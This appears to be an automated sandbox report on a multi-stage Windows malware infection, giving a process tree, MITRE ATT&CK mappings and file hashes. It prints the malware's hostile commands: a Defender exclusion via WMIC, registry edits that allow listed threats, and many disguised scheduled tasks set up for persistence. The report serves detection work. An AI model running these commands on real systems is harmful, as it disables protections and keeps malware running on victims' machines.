C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:6612
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 14:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\uDyJvRQ.exe\" mP /Uksite_idZRx 385118 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:5444
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"2⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\u40c.0.exe"C:\Users\Admin\AppData\Local\Temp\u40c.0.exe"3⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\u40c.1.exe"C:\Users\Admin\AppData\Local\Temp\u40c.1.exe"3⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"2⤵PID:5172
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"2⤵PID:5668
-
-
C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"2⤵PID:5812
-
-
C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"2⤵PID:5696
-
-
C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"2⤵PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\a\RoulleteBotPro_x32-x64.exe"C:\Users\Admin\AppData\Local\Temp\a\RoulleteBotPro_x32-x64.exe"2⤵PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\a\random.exe"C:\Users\Admin\AppData\Local\Temp\a\random.exe"2⤵PID:6344
-
-
C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"2⤵PID:6804
-
-
C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"2⤵PID:372
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:7012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:7044
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"2⤵PID:6552
-
-
C:\Users\Admin\AppData\Local\Temp\a\pt.exe"C:\Users\Admin\AppData\Local\Temp\a\pt.exe"2⤵PID:6036
-
C:\Windows\system32\cmd.exe"cmd" /C tasklist3⤵PID:7044
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"2⤵PID:7096
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
C:\Windows\svchost.exeC:\Windows\svchost.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4808
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
PID:4220
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
PID:196
-
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"1⤵
- Executes dropped EXE
PID:1380 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4548
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
PID:1832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\Temp\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Temp\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Pictures\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Pictures\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\My Pictures\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Vss\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Vss\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Vss\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\SoftwareDistribution\Jufrxnb.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Jufrxnb" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\SoftwareDistribution\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "securitychecks" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\securitycheck.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "securitycheck" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\securitycheck.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "securitychecks" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\securitycheck.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\Idle.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\Cookies\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2988
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Cookies\Idle.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "New Text DocumentN" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\New Text Document.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "New Text Document" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\New Text Document.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "New Text DocumentN" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\New Text Document.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "june.tmpj" /sc MINUTE /mo 11 /tr "'C:\Windows\Migration\WTR\june.tmp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "june.tmp" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\june.tmp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "june.tmpj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\june.tmp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Retailer_progR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\PackageManifests\Retailer_prog.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Retailer_prog" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\Retailer_prog.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Retailer_progR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\PackageManifests\Retailer_prog.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\BlockComponentwebMonitordhcp\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\BlockComponentwebMonitordhcp\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\agentDllDhcp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\agentDllDhcp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\agentDllDhcp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\WerFault.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\WerFault.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\WerFault.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3288
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2820 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:1440
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2260
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:408
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:1952
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3100
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:4484
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵PID:5028
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵
- Suspicious use of SetThreadContext
PID:6084 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵PID:5960
-
-
C:\Windows\system32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"2⤵PID:5964
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f2⤵PID:2444
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵
- DcRat
- Creates scheduled task(s)
PID:5592
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"2⤵PID:5968
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3f41⤵PID:1832
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵PID:5344
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵PID:5768
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵PID:5716
-
-
C:\Windows\system32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"2⤵PID:7044
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f2⤵PID:6600
-
-
C:\Users\Admin\AppData\Local\WindowsHealthSystem.exeC:\Users\Admin\AppData\Local\WindowsHealthSystem.exe1⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\uDyJvRQ.exeC:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\uDyJvRQ.exe mP /Uksite_idZRx 385118 /S1⤵PID:1368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:6700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2448
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:6684
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a4a855 /state1:0x41c64e6d1⤵PID:1056
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Modify Registry
4Pre-OS Boot
1Bootkit
1Scripting
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444KB
MD52d2ca48b8c09de0645b7fd0223c922f0
SHA1de1f948065d612cd649564e466e362198f8ce3e6
SHA25672e63f73ced48b29f196e48030215273a17f7827c310f2747321cbc1f388c206
SHA512452f545f1f4d834a2cd92910fe5caa8c0f2ffdbaf2b3a0370c17f953422d37c13e10212219cae04fad93d07e81f370010a1951b29f2e83f78694ed68637d27bb
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
6.6MB
MD5c11b11791baf0ced61ccbe5461b0ca8f
SHA1a67c49f9e5c780c107fb0be6287d00aae9ad2201
SHA256dee58401aa02b08645a4448138f8826dbed917c1d38539210315dd9e90acd3cf
SHA5122a41ca11bdb440ccd8b0f228c50671420bac7342b22a7ef018d328d9066a8044be663fc01f9fc7d2e360ff0b5e799c52d8aec1e4cffaaf3aa8908f34b4788c57
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD50c2899d7c6746f42d5bbe088c777f94c
SHA1622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA2565b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
18KB
MD50efed7b574abc9a2230c196f1dca5c6d
SHA1e2ea290fd6dcc2daa95ede496c7c9dbceb11e12c
SHA2561b0afcb844b6eb657a0be8ffacb955854ac8a34dbd0b7542d697659977f4c158
SHA512a2d084eeae9ab4e8a2cc735f6a182d6b9b5b3c4bf7f1457649643eb10a1b9b77f5bb5208c4f5f85388dee018d43a7a07c084fa3fe720688d41d68c34feadc349
-
Filesize
1KB
MD5c67a9779fb3e07e2e3975b0553d13b9a
SHA152e8850ab89417a86f58bea07942bd27f65a4168
SHA2565e0fd6fbd32ca8c35cec7b92f5b0275b2c8da42acdf2f1fccb30b4501889f597
SHA5126e8eb2181b5e706fa832ee2a0547d133c2a049ee5f4a58daab73886afa7e004a668040d964cb0ea71b4791314debf10eaa527b989a74a2b77d204d1ba6c0b637
-
Filesize
1KB
MD513cae8eaab4c6b6606ad80af272863be
SHA1b7433cfe2ad7fbf8a26ea8b75a9c90468b61cbfb
SHA2569336edaef97530c432ba0293c6ab30ab7b2d3a7dcce81c5fda592df4b397e7f4
SHA512fbc5c59359239d746c7eb6fad2174cbd857b9846890e658a4de831ad8f9f273da9f5b01ce7fa975f55d9e6ad27989cf57230fba5de932953e9624eaa90864487
-
Filesize
1KB
MD593250ecb696b58271071e8864f3a89d4
SHA1b7b70327e65cf4fdd2e0629a00833d099ec7dfcc
SHA256f96c54cfa624d5cd03a2d88c9279cadb06f8300c35b0420d59ded83b1ece03f3
SHA512420a0471e2dc071197a482c657471a98fe060e50a1952adf0c00f8fca90da93becacc8b5140efdc0701dfa7d263ee02e5bb62de50e7ed6454f8ba9dc4f38f9c7
-
Filesize
1KB
MD594c30f0bc3eb35d92370863c1689ea89
SHA1bb7138b85a522dc98aff23f40d81f0d7cb712692
SHA256074fc3ea05d12d7c45e3ea1f4f887f8e6fd57cd6d5a0e1a9e27362cfbd0fee0f
SHA51292047e6085d5af0740d9dda324eb153e8f9bbd75ebca559740aecb3a0d08876ac72deecf09214749e53e12a24908944e3e80dcd33f4a29f961355bfa64d17502
-
Filesize
1KB
MD5979ce954fb041c3f0175316be34a634b
SHA1c985d3c0c0e59f42a8ef6d0b37aecae9662d6d6e
SHA25602d419df4fc244f55b52d975259af105221aaba2daaf092bbcef31e9bba224da
SHA5122950570c3d0e12d083015ad476b798e81ec73ae939d94546092b4ea37c9e8e62078c7d8c3af11d10e973a3745c1ea048d30dd5ffe84c22756ca5d1fcc9743eec
-
Filesize
1KB
MD5b7929ee67156a995d2a556afccf2943c
SHA13d0fd6b23a5a7d472fd6aec39ee6530c5e9cef37
SHA25625305a1d4e4ea78142681cf00fa1ea33313464a5339ce0125a15fc10ef1717c3
